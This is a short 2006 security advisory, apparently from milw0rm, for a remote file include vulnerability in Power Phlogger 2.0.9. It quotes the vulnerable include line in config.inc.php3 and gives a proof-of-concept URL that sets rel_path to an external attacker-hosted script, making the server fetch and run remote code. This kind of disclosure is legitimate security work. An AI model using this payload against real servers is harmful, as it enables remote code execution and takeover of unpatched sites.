Power Phlogger 2.0.9 Remote|Local File Include Vulnerability

2006-10-23T00:00:00
ID SECURITYVULNS:DOC:14804
Type securityvulns
Reporter Securityvulns
Modified 2006-10-23T00:00:00

Description

Power Phlogger 2.0.9 -

Class: Remote|Local File Include Vulnerability

Remote: Yes

Local: No

Type: High

Site: http://www.comscripts.com/scripts/php.power-phlogger.211.html

Author: x_w0x

Contact: x_w0x@hotmail.com

Vuln Code

(config.inc.php3): <?php include $rel_path."functions.php3";//nothing here ?>

http://victim.com/[Power Phlogger 2.0.9]/config.inc.php3?rel_path=http://DarknesseScript.txt

Gr££tz:makoki, azzcoder,xoron,osm@n

Speciale gr££tz: str0ke, and elite-team

milw0rm.com [2006-10-19]